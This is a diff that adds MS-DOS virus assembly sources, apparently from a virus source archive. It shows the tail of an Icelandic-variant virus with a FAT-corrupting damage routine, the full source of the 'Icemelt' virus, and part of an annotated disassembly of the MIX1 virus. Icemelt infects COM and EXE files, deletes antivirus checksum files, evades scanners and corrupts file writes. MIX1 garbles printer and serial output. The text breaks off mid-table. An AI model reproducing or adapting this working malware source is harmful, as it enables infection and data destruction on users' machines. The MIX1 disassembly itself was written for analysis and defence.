Next the read/write pointer is moved to the end of the file-4, +; and the last 4 bytes read. They are compared to the signature, +; and if equal nothing happens. +; + MOV AX,4202H + MOV CX,-1 + MOV DX,-4 + INT 21H + JC L9 + ADD AX,4 + MOV DS:[LEN_LO],AX + JNC L8A + INC DX +L8A: MOV DS:[LEN_HI],DX + + MOV AH,3FH + MOV CX,4 + MOV DX,OFFSET ID+4 + INT 21H + JNC L11 +L9: MOV AH,3EH + INT 21H +L10: JMP L7 +; +; Compare to 4418,5F19 +; +L11: MOV SI,OFFSET ID+4 + MOV AX,[SI] + CMP AX,4418H + JNE L12 + MOV AX,[SI+2] + CMP AX,5F19H + JE L9 +; +; The file is not infected, so the next thing the virus does is +; infecting it. First it is padded so the length becomes a multiple +; of 16 bytes. Tis is probably done so the virus code can start at a +; paragraph boundary. +; +L12: MOV AX,DS:[LEN_LO] + AND AX,0FH + JZ L13 + MOV CX,16 + SUB CX,AX + ADD DS:[LEN_LO],CX + JNC L12A + INC DS:[LEN_HI] +L12A: MOV AH,40H + INT 21H + JC L9 +; +; Next the main body of the virus is written to the end. +; +L13: XOR DX,DX + MOV CX,OFFSET ID + 4 + MOV AH,40H + INT 21H + JC L9 +; +; Next the .EXE file header is modified: +; +; First modify initial IP +; + MOV AX,OFFSET LABIA + MOV DS:ID[1CH],AX +; +; Modify starting CS = Virus CS. It is computed as: +; +; (Original length of file+padding)/16 - Start of load module +; + MOV DX,DS:[LEN_HI] + MOV AX,DS:[LEN_LO] + SHR DX,1 + RCR AX,1 + SHR DX,1 + RCR AX,1 + SHR DX,1 + RCR AX,1 + SHR DX,1 + RCR AX,1 + SUB AX,DS:ID[10H] + MOV DS:ID[1EH],AX +; +; Modify length mod 512 +; + ADD DS:[LEN_LO],OFFSET ID+4 + JNC L14 + INC DS:[LEN_HI] +L14: MOV AX,DS:[LEN_LO] + AND AX,511 + MOV DS:ID[0AH],AX +; +; Modify number of blocks used +; + MOV DX,DS:[LEN_HI] + MOV AX,DS:[LEN_LO] + ADD AX,511 + JNC L14A + INC DX +L14A: MOV AL,AH + MOV AH,DL + SHR AX,1 + MOV DS:ID[0CH],AX +; +; Finally the modified header is written back to the start of the +; file. +; +QQQ: MOV AX,4200H + XOR CX,CX + XOR DX,DX + INT 21H + JC ENDIT + MOV AH,40H + MOV DX,OFFSET ID+8 + MOV CX,1CH + INT 21H + JC ENDIT + MOV AH,3EH + INT 21H + JNC DAMAGE +; +; Infection is finished - close the file and execute it +; +ENDIT: JMP L9 +NEW21 ENDP +; +; The damage routine. As before noted, it will only do damage on +; systems with a hard disk larger than 10Mbytes (With 16 bit FAT) +; +TEMP DW 0 +; +; Start by getting some information about the current drive, like size +; of the FAT etc. Then compute the total number of sectors, and quit +; unless it is greater than 20740. This is probably done since larger +; disks use 16 bit FAT entries, instead of 12, which makes life easier +; for the programmer. +; +DAMAGE: MOV AH,32H + MOV DL,0 + INT 21H + CMP AL,0FFH + JE L21 + XOR AX,AX + MOV AL,[BX+4] + INC AX + MOV CS:[TEMP],AX + MOV AX,[BX+0DH] + DEC AX + MUL CS:[TEMP] + ADD AX,[BX+0BH] + JNC L15A + INC DX +L15A: CMP DX,0 + JNE L15B + CMP AX,20740 + JBE L21 +; +; Check if DOS version is 4.0 or greater. If so, use a 16 bit value +; for numbers of sectors in the FAT, otherwise use a 8 bit entry. +L15B: PUSH BX + MOV AH,30H + INT 21H + POP BX + CMP AL,4 + JAE L15 + XOR AX,AX + MOV AL,[BX+0FH] + JMP SHORT L16 +L15: MOV AX,[BX+0FH] +L16: ADD AX,[BX+6] + DEC AX + MOV DX,AX + MOV AL,[BX] +; +; Read the last sector in the first copy of the FAT. Search backwards +; for an unused entry. If none is found, read the sector before that +; and so on. If no free entry is found on the entire disk then quit. +; +L20: MOV CX,1 + MOV BX,OFFSET ID+4 + PUSH CS + POP DS + PUSH AX + PUSH DX + INT 25H + POPF + JC L21 + POP DX + POP AX + MOV SI,510 +L17: MOV BX,DS:[ID+4+SI] + CMP BX,0000 + JE L19 + CMP SI,0000 + JE L18 + DEC SI + DEC SI + JMP L17 +L18: DEC DX + CMP DX,8 + JE L21 + JMP L20 +; +; A free entry has been found. Make it look like a bad cluster, by +; changing the 0000 value to FFF7. +; +L19: MOV DS:[ID+4+SI],0FFF7H + MOV CX,1 + MOV BX,OFFSET ID+4 + INT 26H + POPF +L21: JMP L7 + +COUNTER DB 10 +LEN_LO DW ? +LEN_HI DW ? +ID DW 4418H,5F19H ; The signature of the virus. +; +; A buffer, used for data from the file. +; +_TEXT ENDS + + END LABIA + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.icemelt.asm b/MSDOS/Virus.MSDOS.Unknown.icemelt.asm new file mode 100644 index 00000000..454fd062 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.icemelt.asm @@ -0,0 +1,409 @@ + +; - +; Icemelt - (c)1995 irogen - Using iCE v0.2 +; - +; +; Infects COM and EXE when executed. +; COM Infection marker: fourth byte is 0 +; EXE infection marker: Checksum in header not equal to 0. +; Time/Date do not change +; Read-only and hidden files will be infected, and attributes restored. +; Virus installs its own critical error handler +; Deletes MSAV and CPAV Checksum filez. +; Activates on the second of any month, at which time it will phuck +; up all file writes using INT 21h/func 40h. +; Does not use ViCE anti-tbscan. Has a second cryptor to thwart many +; TBSCAN flags. Does not use ViCE Garbage. +; + + +cseg segment + assume cs:cseg, ds:cseg, es:cseg, ss:cseg + +signal equ 0FA01h ; AX=signal/INT 21h/installation chk +vsafe_word equ 5945h ; magic word for VSAFE/VWATCH API +special equ 11h +act_day equ 2 +buf_size equ 170 +vice_size equ 1602+buf_size +virus_size equ (offset vend-offset start)+VICE_SIZE +extrn _vice:near + +org 0h +start: + + push ds es + inc si + mov ax,1000h ; looks like legit. INT call.. + add ax,signal-1000h ; are we memory resident? + mov dx,vsafe_word + mov bl,special + int 21h + call nx ; get relative offset + nx: pop bp + sub bp,offset nx + or si,si + jz no_install ; if carry then we are + + call crypt ; decrypt the next few bytez +c_start: + mov cs:activate[bp],0 + mov ah,2ah ; get date + int 21h + cmp dl,act_day ; + jnz no_act + mov cs:activate[bp],1 +no_act: + + mov ax,ds ; PSP segment + dec ax ; mcb below PSP m0n + mov ds,ax ; DS=MCB seg + cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain? + jnz no_install + sub word ptr ds: [3],((virus_size+1023)/1024)*64*2 ; alloc MCB + sub word ptr ds: [12h],((virus_size+1023)/1024)*64*2 ; alloc PSP + mov es,word ptr ds: [12h] ; get high mem seg + push cs + pop ds + mov si,bp + mov cx,virus_size/2+1 + xor di,di + rep movsw ; copy code to new seg + xor ax,ax + mov ds,ax ; null ds + push ds + lds ax,ds: [21h*4] ; get 21h vector + mov es: word ptr old21+2,ds ; save S:O + mov es: word ptr old21,ax + pop ds + mov ds: [21h*4+2],es ; new int 21h seg + mov ds: [21h*4],offset new21 ; new offset + sub byte ptr ds: [413h],((virus_size+1023)*2)/1024;-totalmem +c_end: +no_install: + + pop es ds ; restore ES DS + cmp cs:is_exe[bp],1 + jz exe_return + + lea si,org_bytes[bp] ; com return + mov di,0100h ; -restore first 4 bytes + mov cx,2 + rep movsw + + mov ax,100h ; jump back to 100h + push ax +_ret:ret + + exe_return: + mov cx,ds ; calc. real CS + add cx,10h + add word ptr cs:[exe_jump+2+bp],cx + int 3 ; fix prefetch + db 0eah +exe_jump dd 0 +is_exe db 0 + +; +; Crypts portion of virus +; +crypt_res: + xor bp,bp +crypt: + lea si,c_start + add si,bp + mov cx,(offset c_end-offset c_start) + add byte ptr cs:xor_op[bp],10h ; self modifying code... + int 3 ; fix prefetch +l1: + db 2Eh +xor_op db 70h,34h ; tbscan won't flag this bitch +xor_val db 0 + inc si + loop l1 + sub byte ptr cs:xor_op[bp],10h ; unmodify code + ret + +; +; Infection routine - called from INT 21h handler. +; DS:DX=fname +; + +infect_file: + + push dx + pop si + + push ds + xor ax,ax ; null ES + mov es,ax + lds ax,es:[24h*4] ; get INT 24h vector + mov cs:old_24_off,ax ; save it + mov cs:old_24_seg,ds + mov es:[24h*4+2],cs ; install our handler + mov es:[24h*4],offset new_24 + pop ds + push es ; we'll need it later + push cs + pop es + + mov ax,4300h ; get phile attribute + int 21h + mov ax,4301h ; null attribs + push ax cx ; save AX-call/CX-attrib + xor cx,cx + int 21h + + mov ax,3d02h ; open the file + int 21h + jc dont_do + + mov bx,ax ; get handle + + push cs + pop ds + + call kill_chklst + + mov ah,3fh ; Read first bytes of file + mov cx,20h + lea dx,org_bytes + int 21h + + cmp byte ptr org_bytes,'M' ; single byte avoids heuristic flag + jz do_exe + cmp byte ptr org_bytes+3,0 + jz close + + mov is_exe,0 + + mov ax,5700h ; get time/date + int 21h + push cx dx + + call offset_end + push ax ; AX=end of file + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor/ + push di ; encrypted code. (at heap) + mov cx,virus_size ; CX=virus size + mov dx,ax ; DX=EOF offset + add dx,100h ; DX=offset decryptor will run from + mov al,00000001b ; no garbage, no CS: + call _vice ; call engine! + + pop dx + mov ah,40h + int 21h + + call offset_zero + pop ax ; restore COM file size + sub ax,3 ; calculate jmp offset + mov word ptr new_jmp+1,ax + + lea dx,new_jmp + mov cx,4 + mov ah,40h + int 21h + + pop dx cx ; pop date/time + mov ax,5701h ; restore the mother fuckers + int 21h + + close: + + pop cx ax ; restore attrib + int 21h + + mov ah,3eh + int 21h + + dont_do: + pop es ; ES=0 + lds ax,dword ptr old_24_off ; restore shitty DOS error handler + mov es:[24h*4],ax + mov es:[24h*4+2],ds + + ret + + do_exe: + + cmp word ptr exe_header[12h],0 ; is checksum (in hdr) 0? + jnz close + cmp byte ptr exe_header[18h],52h ; pklite'd? + jz exe_ok + cmp byte ptr exe_header[18h],40h ; don't infect new format exe + jge close +exe_ok: + push bx + + mov ah,2ch ; grab a random number + int 21h + mov word ptr exe_header[12h],dx ; mark that it's us + mov is_exe,1 + + les ax,dword ptr exe_header+14h ; Save old entry point + mov word ptr ds:exe_jump, ax + mov word ptr ds:exe_jump+2, es + + push cs + pop es + + call offset_end + + push dx ax ; save file size DX:AX + + mov bx, word ptr exe_header+8h ; calc. new entry point + mov cl,4 ; *16 + shl bx,cl ; ^by shifting one byte + sub ax,bx ; get actual file size-header + sbb dx,0 + mov cx,10h ; divide AX/CX rDX + div cx + + mov word ptr exe_header+14h,dx + mov word ptr exe_header+16h,ax + mov rel_off,dx + + pop ax ; AX:DX file size + pop dx + pop bx + + mov cx,virus_size+10h ; calc. new size + adc ax,cx + + mov cl,9 ; calc new alloc (512) + push ax + shr ax,cl + ror dx,cl + stc + adc dx,ax + pop ax ; ax=size+virus + and ah,1 + + mov word ptr exe_header+4h,dx + mov word ptr exe_header+2h,ax + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor and + push di ; encrypted code (at heap) + mov cx,virus_size ; CX=virus size + mov dx,rel_off ; DX=offset decryptor will run from + mov al,00000000b ; no garbage, use CS: + call _vice ; call engine! + + pop dx + mov ah,40h + int 21h + + call offset_zero + + mov cx,18h ; write fiXed header + lea dx,exe_header + mov ah,40h + int 21h + + jmp close + +; +; set file ptr + +offset_zero: ; self explanitory + xor al,al + jmp set_fp +offset_end: + mov al,02h + set_fp: + mov ah,42h + xor cx,cx + xor dx,dx + int 21h + ret + +; +; Kill those darned MSAV and CPAV filez.. +; +kill_chklst: + mov di,2 ; counter for loop + lea dx,first_2die ; first fname to kill +kill_loop: + mov ax,4301h ; reset attribs + xor cx,cx + int 21h + mov ah,41h ; delete phile + int 21h + lea dx,last_2die ; second fname to kill + dec di + jnz kill_loop + + ret +first_2die db 'CHKLIST.MS',0 ; MSAV shitty checksum +last_2die db 'CHKLIST.CPS',0 ; CPAV shitty checksum + + + + +; +; new 21h + +new21: + + pushf + cmp ax,signal ; be it us? + jnz not_us ; richtig.. + cmp dx,vsafe_word + jnz not_us + cmp bl,special + jnz not_us + xor si,si + mov di,4559h + jmp jmp_org +not_us: + cmp cs:activate,0 ; time to activate? + jz nchk + cmp ah,40h ; write to phile? + jnz jmp_org + lea dx,credits ; phuck up address.. + push cs + pop ds +nchk: cmp ax,4b00h ; execute phile? + jnz jmp_org + + push ax bx cx di dx si ds es bp dx + mov ah,2ch ; grab random for cryptor + int 21h + mov byte ptr cs:xor_val,dl + pop dx + call crypt_res + call infect_file + call crypt_res + pop bp es ds si dx di cx bx ax + + jmp_org: + popf + db 0eah ; jump far XXXX:XXXX + old21 dd 0 + + +new_24: ; critical error handler + mov al,3 ; prompts suck, return fail + iret + + +activate db 0 +txt_ptr dw offset credits +credits db '[IceMelt, by irogen]' +credit_end: +new_jmp db 0E9h,0,0,0 ; jmp XXXX,0 +rel_off dw 0 +exe_header: +org_bytes db 0CDh,20h,0,0 ; original COM bytes | exe hdr +heap: +db 16h dup(0) ; remaining exe header space +old_24_off dw 0 ; old int24h vector +old_24_seg dw 0 +vend: +cseg ends + end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.icemix1.asm b/MSDOS/Virus.MSDOS.Unknown.icemix1.asm new file mode 100644 index 00000000..6d2ee6cf --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.icemix1.asm @@ -0,0 +1,857 @@ +; THE MIX1 virus +; +; It was first detected in Israel in August '89. +; +; Disassembly done Sept. 24-25 '89. +; +; The author of this program is unknown, but it is clearly a +; modification of the "Icelandic" virus, with considerable +; additions +; +; All comments in this file were added by Fridrik Skulason, +; University of Iceland/Computing Services. +; +; INTERNET: frisk@rhi.hi.is +; UUCP: ...mcvax!hafro!rhi!frisk +; BIX: FRISK +; +; To anyone who obtains this file - please be careful with it, I +; would not like to see this virus be distributed too much. +; +; A short description of the virus: +; +; It only infects .EXE files. Infected files grow by ... to ... bytes. +; The virus attaches itself to the end of the programs it infects. +; +; When an infected file is run, the virus copies itself to top of +; free memory, and modifies the memory blocks, in order to hide from +; memory mapping programs. Some programs may overwrite this area, +; causing the computer to crash. +; +; The virus will hook INT 21H and when function 4B (EXEC) is called +; it sometimes will infect the program being run. It will check every +; tenth program that is run for infection, and if it is not already +; infected, it will be. +; +; The virus will remove the Read-Only attribute before trying to +; infect programs. +; +; Infected files can be easily recognized, since they always end in +; "MIX1" +; +; To check for system infection, a byte at 0:33C is used - if it +; contains 77 the virus is installed in memory. +; +; +VIRSIZ EQU 128 + +; +; This is the original program, just used so this file, when +; assembled, will produce an active copy. +; +_TEXT1 SEGMENT PARA PUBLIC +_START DB 0b4H,09H + PUSH CS + POP DS + MOV DX,OFFSET STRING + INT 21H + MOV AX,4C00H + INT 21H +STRING DB "Hello world!",0dh,0ah,"$" + _TEXT1 ENDS + +CODE SEGMENT PARA PUBLIC 'CODE' + ASSUME CS:CODE,DS:NOTHING,SS:NOTHING,ES:NOTHING + +; +; The virus is basically divided in the following parts. +; +; 1. The main program - run when an infected program is run. +; It will check if the system is already infected, and if not +; it will install the virus. +; +; 2. The new INT 17 handler. All outgoing characters will be garbled. +; +; 3. The new INT 14 handler. All outgoing characters will be garbled. +; +; 4. The new INT 8 handler. +; +; 5. The new INT 9 handler. Disables the Num-Lock key +; +; 6. The new INT 21 handler. It will look for EXEC calls, and +; (sometimes) infect the program being run. +; +; Parts 1 and 6 are almost identical to the Icelandic-1 version +; +; This is a fake MCB +; + DB 'Z',00,00,VIRSIZ,0,0,0,0,0,0,0,0,0,0,0,0 + +VIRUS PROC FAR +; +; The virus starts by pushing the original start address on the stack, +; so it can transfer control there when finished. +; +LABEL: DEC SP ; This used to be SUB SP,4 + DEC SP + NOP + DEC SP + DEC SP + PUSH BP + MOV BP,SP + NOP ; added + PUSH AX + NOP ; added + MOV AX,ES +; +; Put the the original CS on the stack. The ADD AX,data instruction +; is modified by the virus when it infects other programs. +; + DB 05H +ORG_CS DW 0010H + MOV [BP+4],AX +; +; Put the the original IP on the stack. This MOV [BP+2],data instruction +; is modified by the virus when it infects other programs. +; + DB 0C7H,46H,02H +ORG_IP DW 0000H +; +; Save all registers that are modified. +; + PUSH ES + PUSH DS + PUSH BX + PUSH CX + PUSH SI + PUSH DI +; +; Check if already installed. Quit if so. +; + MOV AX,0 ; Was: XOR AX,AX + MOV ES,AX + CMP ES:[33CH],BYTE PTR 077H + JNE L1 +; +; Restore all registers and return to the original program. +; +EXIT: POP DI + POP SI + POP CX + POP BX + POP DS + POP ES + POP AX + POP BP + RET +; +; The virus tries to hide from detection by modifying the memory block it +; uses, so it seems to be a block that belongs to the operating system. +; +; It looks rather weird, but it seems to work. +; +L1: MOV AH,52H + INT 21H + MOV AX,ES:[BX-2] + MOV ES,AX + PUSH ES ; Two totally unnecessary instructions + POP AX ; added + ADD AX,ES:[0003] + INC AX + INC AX + MOV CS:[0001],AX +; +; Next, the virus modifies the memory block of the infected program. +; It is made smaller, and no longer the last block. +; + MOV BX,DS + DEC BX + PUSH BX ; Unnecessary addition + POP AX + MOV DS,BX + MOV AL,'M' + MOV DS:[0000],AL + MOV AX,DS:[0003] + SUB AX,VIRSIZ + MOV DS:[0003],AX + ADD BX,AX + INC BX +; +; Then the virus moves itself to the new block. +; + PUSH BX ; Was: MOV ES,BX + POP ES + MOV SI,0 ; Was: XOR SI,SI XOR DI,DI + MOV DI,SI + PUSH CS + POP DS + MOV CX,652H + CLD + REP MOVSB +; +; The virus then transfers control to the new copy of itself. +; + PUSH ES + MOV AX,OFFSET L3 + PUSH AX + RET +; +; Zero some variables +; +L3: MOV BYTE PTR CS:[MIN60],0 + NOP + MOV BYTE PTR CS:[MIN50],0 + NOP + MOV WORD PTR CS:[TIMER],0 +; +; The most nutty way to zero ES register that I have ever seen: +; + MOV BX,0FFFFH + ADD BX,3F3FH + MOV CL,0AH + SHL BX,CL + AND BX,CS:[CONST0] + MOV AX,BX + MOV ES,AX +; +; Set flag to confirm installation +; + MOV BYTE PTR ES:[33CH],77H +; +; Hook interrupt 21: +; + MOV AX,ES:[0084H] + MOV CS:[OLD21],AX + MOV AX,ES:[0086H] + MOV CS:[OLD21+2],AX + MOV AX,CS + MOV ES:[0086H],AX + MOV AX,OFFSET NEW21 + MOV ES:[0084H],AX +; +; Hook interrupt 17: +; + MOV AX,ES:[005CH] + MOV CS:[OLD17],AX + MOV AX,ES:[005EH] + MOV CS:[OLD17+2],AX + MOV AX,CS + MOV ES:[005EH],AX + MOV AX,OFFSET NEW17 + MOV ES:[005CH],AX +; +; Hook interrupt 14: +; + MOV AX,ES:[0050H] + MOV CS:[OLD17],AX + MOV AX,ES:[0052H] + MOV CS:[OLD14+2],AX + MOV AX,CS + MOV ES:[0052H],AX + MOV AX,OFFSET NEW14 + MOV ES:[0050H],AX +; +; +; + CMP WORD PTR CS:[NOINF],5 + JG HOOK9 + JMP EXIT +; +; Hook interrupt 9 +; +HOOK9: MOV AX,ES:[0024H] + MOV CS:[OLD9],AX + MOV AX,ES:[0026H] + MOV CS:[OLD9+2],AX + MOV AX,CS + MOV ES:[0026H],AX + MOV AX,OFFSET NEW9 + MOV ES:[0024H],AX +; +; Hook interrupt 8 +; + MOV AX,ES:[0020H] + MOV CS:[OLD8],AX + MOV AX,ES:[0022H] + MOV CS:[OLD8+2],AX + MOV AX,CS + MOV ES:[0022H],AX + MOV AX,OFFSET NEW8 + MOV ES:[0020H],AX + JMP EXIT +; +; Video processing +; +VID: PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH DI + PUSH DS + PUSH ES + PUSH CS + POP DS + MOV AH,0FH + INT 10H + MOV AH,6 + MUL AH + MOV BX,AX + MOV AX,DS:[BX+OFFSET VIDEOT] + MOV CX,DS:[BX+OFFSET VIDEOT+2] + MOV DX,DS:[BX+OFFSET VIDEOT+4] + MOV ES,DX + SHR CX,1 + MOV DI,1 + CMP AX,0 + JNZ V1 +V0: INC WORD PTR ES:[DI] + INC DI + INC DI + LOOP V0 + JMP SHORT V2 + NOP +V1: NOT WORD PTR ES:[DI] + INC DI + INC DI + LOOP V1 +V2: POP ES + POP DS + POP DI + POP DX + POP CX + POP BX + POP AX + RET +; +; INT 9 replacement: Just fiddle around with the NUM-LOCK etc. +; This routine does not become active until 50 minutes after +; the execution of an infected program. +; +NEW9: PUSH AX + PUSH ES + CMP BYTE PTR CS:[MIN50],1 + JNZ RETX1 + XOR AX,AX + MOV ES,AX ; was xxxxxxxx + AND BYTE PTR ES:[417H],0BFH ; x0xxxxxx + OR BYTE PTR ES:[417H],20H ; x01xxxxx + TEST BYTE PTR ES:[417H],0CH + JZ RETX1 + IN AL,60 + CMP AL,53 + JNZ RETX1 + AND BYTE PTR ES:[417H],0F7H +; +; This seems to be an error - the virus uses a FAR call, which will +; probably cause the computer to crash. +; + DB 9AH + DW OFFSET VID,171CH +; +; This needs more checking. +; + +RETX1: POP ES + POP AX + DB 0EAH +OLD9 DW 0,0 +; +; New INT 14 routine - garble all outgoing characters +; +NEW14: CMP AH,1 + JZ S1 +DO14: DB 0EAH +OLD14 DW 0,0 +S1: PUSH BX + XOR BX,BX + MOV BL,AL + ADD BX,OFFSET ERRTAB + MOV AL,CS:[BX] ; use old character as index into table + POP BX + JMP DO14 +; +; New INT 8 routine +; +NEW8: PUSH DX + PUSH CX + PUSH BX + PUSH AX + CMP BYTE PTR CS:[MIN60],01 ; If counter >= 60 min. + JZ TT0 ; No need to check any more + INC WORD PTR CS:[TIMER] ; else increment timer + CMP WORD PTR CS:[TIMER],-10 ; 60 minutes ? + JZ TT1 + CMP WORD PTR CS:[TIMER],54600 ; 50 minutes ? + JZ TT2 + JMP TXEX +; +; 50 minutes after an infected program is run the flag is set. +; +TT2: MOV BYTE PTR CS:[MIN50],1 + NOP + JMP TXEX +; +; 60 minutes after an infected program is run we start the ball bouncing. +; +TT1: MOV BYTE PTR CS:[MIN60],1 +; +; Get current cursor position and save it +; + MOV AH,3 + MOV BH,0 + INT 10H + MOV CS:[SCRLINE],DH + MOV CS:[SCRCOL],DL +; +; Set cursor position +; + MOV AH,2 + MOV BH,0 + MOV DH,CS:[MYLINE] + MOV DL,CS:[MYCOL] + INT 10H +; +; Check what is there and store it +; + MOV AH,8 + MOV BH,0 + INT 10H + MOV CS:[ONSCREEN],AL +; +; Set cursor position back as it was before +; + MOV AH,2 + MOV BH,0 + MOV DH,CS:[SCRLINE] + MOV DL,CS:[SCRCOL] + INT 10H +; +; Get current video mode and store it +; + MOV AH,0FH + INT 10H + MOV CS:[VMODE],AH +; +; Exit interrupt routine +; + JMP TXEX +; +; Every time an INT 8 occurs, after the 60 min. have passed, we +; end up here: +; +; First get current cursor position +; +TT0: MOV AH,3 + MOV BH,0 + INT 10H + MOV CS:[SCRLINE],DH + MOV CS:[SCRCOL],DL +; +; Then set it to last position of ball. +; + MOV AH,2 + MOV BH,0 + MOV DH,CS:[MYLINE] + MOV DL,CS:[MYCOL] + INT 10H +; +; Write previous character there ... +; + MOV AH,0EH + MOV AL,CS:[ONSCREEN] + MOV BX,0 + INT 10H +; +; + CMP BYTE PTR CS:[UPDOWN],0 + JZ T2 +; +; + DEC BYTE PTR CS:[MYLINE] + JMP SHORT T3 + NOP +T2: INC BYTE PTR CS:[MYLINE] +T3: CMP BYTE PTR CS:[LEFTRIGHT],0 + JZ T4 + DEC BYTE PTR CS:[MYCOL] + JMP SHORT T5 + NOP +T4: INC BYTE PTR CS:[MYCOL] +; +; Get current video mode +; +T5: MOV AH,0FH + INT 10H + MOV CS:[VMODE],AH + MOV AL,CS:[MAXLIN] + CMP CS:[MYLINE],AL ; bottom of screen ? + JNZ T6 +; +; Reached bottom - now go upwards. +; + NOT BYTE PTR CS:[UPDOWN] +T6: CMP BYTE PTR CS:[MYLINE],0 ; reached the top ? + JNZ T7 +; +; Reached top - now go downwards +; + NOT BYTE PTR CS:[UPDOWN] +T7: MOV AL,CS:[VMODE] + CMP CS:[MYCOL],AL + JNZ T8 + NOT BYTE PTR CS:[LEFTRIGHT] +T8: CMP BYTE PTR CS:[MYCOL],0 + JNZ T9 + NOT BYTE PTR CS:[LEFTRIGHT] +; +; Set cursor position to new position of ball +; +T9: MOV AH,02 + MOV BH,0 + MOV DH,CS:[MYLINE] + MOV DL,CS:[MYCOL] + INT 10H +; +; Get what is there and store it. +; + MOV AH,8 + MOV BH,0 + INT 10H + MOV CS:[ONSCREEN],AL +; +; Write character (lower case o) +; + MOV AH,0EH + MOV AL,6FH + MOV BX,0 + INT 10H +; +; And restore cursor position +; + MOV AH,02 + MOV BH,0 + MOV DH,CS:[SCRLINE] + MOV DL,CS:[SCRCOL] + INT 10H +; +; Restore registers and quit +; +TXEX: POP AX + POP BX + POP CX + POP DX + DB 0EAH +OLD8 DW 0,0 +; +; New INT 17 routine. Garble all outgoing characters. +; +NEW17: CMP AH,0 + JZ P0 +DO17: DB 0EAH +OLD17 DW 0,0 +P0: PUSH BX + XOR BX,BX + MOV BL,AL + ADD BX,OFFSET ERRTAB + MOV AL,CS:[BX] + POP BX + JMP DO17 +; +; This is the INT 21 replacement. It only does something in the case +; of an EXEC call. +; +NEW21: CMP AH,4BH + JE L5 +DO21: DB 0EAH +OLD21 DW 0,0 +; +; The code to only infect every tenth program has been removed +; +L5: PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DS +; +; Search for the file name extension ... +; + MOV BX,DX +L6: INC BX + CMP BYTE PTR [BX],'.' + JE L8 + CMP BYTE PTR [BX],0 + JNE L6 +; +; ... and quit unless it starts with "EX". +; +L7: POP DS + POP SI + POP DX + POP CX + POP BX + POP AX + JMP DO21 +L8: INC BX + CMP WORD PTR [BX],5845H + JNE L7 +; +; When an .EXE file is found, the virus starts by turning off +; the read-only attribute. The read-only attribute is not restored +; when the file has been infected. +; + MOV AX,4300H ; Get attribute + INT 21H + JC L7 + MOV AX,4301H ; Set attribute + AND CX,0FEH + INT 21H + JC L7 +; +; Next, the file is examined to see if it is already infected. +; The signature (4418 5F19) is stored in the last two words. +; + MOV AX,3D02H ; Open / write access + INT 21H + JC L7 + MOV BX,AX ; file handle in BX +; +; This part of the code is new: Get date of file. +; + MOV AX,5700H + INT 21H + JC L9 + MOV CS:[DATE1],DX + MOV CS:[DATE2],CX +; + PUSH CS ; now DS is no longer needed + POP DS +; +; The header of the file is read in at [ID+8]. The virus then +; modifies itself, according to the information stored in the +; header. (The original CS and IP addressed are stored). +; + MOV DX,OFFSET ID+8 + MOV CX,1CH + MOV AH,3FH + INT 21H + JC L9 + MOV AX,DS:ID[1CH] + MOV DS:[ORG_IP],AX + MOV AX,DS:ID[1EH] + ADD AX,10H + MOV DS:[ORG_CS],AX +; +; Next the read/write pointer is moved to the end of the file-4, +; and the last 4 bytes read. They are compared to the signature, +; and if equal nothing happens. +; + MOV AX,4202H + MOV CX,-1 + MOV DX,-4 + INT 21H + JC L9 + ADD AX,4 + MOV DS:[LEN_LO],AX + JNC L8A + INC DX +L8A: MOV DS:[LEN_HI],DX +; +; This part of the virus is new - check if it is below minimum length +; + CMP DX,0 + JNE L8B + MOV CL,13 + SHR AX,CL + CMP AX,0 + JG L8B + JMP SHORT L9 + NOP +L8B: MOV AH,3FH + MOV CX,4 + MOV DX,OFFSET ID+4 + INT 21H + JNC L11 +L9: MOV AH,3EH + INT 21H +L10: JMP L7 +; +; Compare to 4418,5F19 +; +L11: MOV SI,OFFSET ID+4 + MOV AX,[SI] + CMP AX,494DH + JNE L12 + MOV AX,[SI+2] + CMP AX,3158H + JE L9 +; +; The file is not infected, so the next thing the virus does is +; infecting it. First it is padded so the length becomes a multiple +; of 16 bytes. Tis is probably done so the virus code can start at a +; paragraph boundary. +; +L12: MOV AX,DS:[LEN_LO] + AND AX,0FH + JZ L13 + MOV CX,16 + SUB CX,AX + ADD DS:[LEN_LO],CX + JNC L12A + INC DS:[LEN_HI] +L12A: MOV AH,40H + INT 21H + JC L9 +; +; Next the main body of the virus is written to the end. +; +L13: MOV DX,0 ; Was: XOR DX,DX + MOV CX,OFFSET ID + 4 + MOV AH,40H + INT 21H + JC L9 +; +; Next the .EXE file header is modified: +; + JMP SHORT F0 ; some unnecessary instructions + NOP +; First modify initial IP +; +F0: MOV AX,OFFSET LABEL + MOV DS:ID[1CH],AX +; +; Modify starting CS = Virus CS. It is computed as: +; +; (Original length of file+padding)/16 - Start of load module +; + MOV DX,DS:[LEN_HI] + MOV AX,DS:[LEN_LO] + MOV CL,CS:[CONST1] ; Modified a bit + SHR DX,CL + RCR AX,CL + SHR DX,CL + RCR AX,CL + SHR DX,CL + RCR AX,CL + SHR DX,CL + RCR AX,CL + SUB AX,DS:ID[10H] + MOV DS:ID[1EH],AX +; +; Modify length mod 512 +; + ADD DS:[LEN_LO],OFFSET ID+4 + JNC L14 + INC DS:[LEN_HI] +L14: MOV AX,DS:[LEN_LO] + AND AX,511 + MOV DS:ID[0AH],AX +; +; Modify number of blocks used +; + MOV DX,DS:[LEN_HI] + MOV AX,DS:[LEN_LO] + ADD AX,511 + JNC L14A + INC DX +L14A: MOV AL,AH + MOV AH,DL + SHR AX,1 + MOV DS:ID[0CH],AX +; +; Finally the modified header is written back to the start of the +; file. +; +QQQ: MOV AX,4200H + MOV CX,0 ; was XOR CX,CX + AND DX,CS:[CONST0] ; was XOR DX,DX + INT 21H + JC ENDIT + MOV AH,40H + MOV DX,OFFSET ID+8 + MOV CX,1CH + INT 21H +; +; This part is new: Restore old date. +; + MOV DX,CS:[DATE1] + MOV CX,CS:[DATE2] + MOV AX,5701H + INT 21H + JC ENDIT + INC WORD PTR CS:[NOINF] +; +; Infection is finished - close the file and execute it +; +ENDIT: JMP L9 +; +; + DW 0 + +VIDEOT: DW 0000H, 07D0H, 0B800H + DW 0000H, 07D0H, 0B800H + DW 0000H, 0FA0H, 0B800H + DW 